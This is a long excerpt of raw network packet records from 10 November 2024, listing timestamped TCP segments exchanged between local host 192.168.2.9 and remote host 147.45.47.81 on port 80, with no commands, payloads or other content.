                                                                                                                                                                                Nov 10, 2024 09:18:28.401649952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401665926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401681900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401695967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401722908 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401742935 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401746988 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401786089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401798964 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401815891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401825905 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401849985 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401865959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401880980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401906013 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401978970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401995897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.402040005 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.442811966 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.442828894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.442847967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.442862034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.442893982 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.442922115 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.458858013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.458884001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.458897114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.458915949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.458929062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.458954096 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.458965063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.458976030 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.458980083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.458993912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459009886 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.459009886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459024906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459028959 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.459075928 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.459651947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459692001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459709883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459738016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459753036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459757090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.459779978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459791899 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.459803104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459816933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459831953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.459845066 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.459873915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.497760057 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.503565073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.503581047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.503593922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.503639936 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.503678083 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.514846087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.514870882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.514884949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.514947891 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.515631914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515652895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515674114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515686989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515701056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515708923 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.515712976 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515727043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515743971 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.515758038 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.515774965 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515800953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515814066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515832901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515845060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515847921 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.515858889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515872955 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.515876055 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515891075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515902042 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.515916109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515932083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.515938997 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.515969992 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516062975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516083956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516097069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516135931 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516159058 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516174078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516211033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516215086 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516222954 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516253948 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516282082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516294956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516307116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516318083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516330004 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516340017 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516354084 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516386986 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516422033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516434908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516447067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516467094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516483068 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516489983 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516501904 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516571999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516591072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516606092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516623020 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516638041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516649008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516650915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516650915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516661882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516684055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516700029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516726971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516809940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516853094 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516866922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516880989 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516891003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516902924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516916990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.516923904 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516937971 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.516974926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517016888 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517055035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517069101 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517082930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517112970 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517158985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517182112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517220020 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517225981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517241955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517278910 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517293930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517307997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517322063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517329931 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517353058 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517359018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517366886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517388105 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517401934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517407894 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517415047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517435074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517445087 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517450094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517487049 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517493963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517508984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517523050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517533064 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517560005 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517574072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517591953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517604113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517617941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517632961 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517657042 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517712116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517724991 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517739058 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517750978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.517779112 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.517812967 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.558387041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.558398962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.558412075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.558428049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.558445930 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.558490038 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.567125082 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.574399948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574428082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574439049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574459076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574470997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574500084 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.574502945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574517012 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574537992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574548006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574548960 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.574567080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574578047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574590921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574615002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.574615002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.574635983 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.574644089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574790955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574811935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574847937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.574847937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574892998 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.574913979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.574963093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.575078011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.575089931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.575140953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.575140953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.575274944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.575344086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.575396061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.575414896 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.575468063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.575479984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.575501919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.575529099 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.575547934 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.619034052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.619050026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.619061947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.619128942 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631119013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631139040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631150007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631170034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631181002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631225109 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631242037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631254911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631267071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631278992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631305933 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631324053 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631330013 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631395102 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631406069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631419897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631432056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631453991 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631483078 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631511927 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631530046 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631542921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631556988 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631563902 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631570101 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631582022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631589890 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631607056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631618023 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631650925 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631660938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631676912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631690979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631702900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631714106 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631771088 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631784916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631840944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631851912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631900072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.631954908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631974936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.631988049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632000923 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632014036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632025957 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632031918 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632031918 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632049084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632062912 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632070065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632085085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632097960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632101059 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632137060 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632150888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632165909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632177114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632208109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632220030 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632221937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632221937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632232904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632257938 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.632338047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632350922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632363081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.632383108 CET4983380192.168.2.9147.45.47.81
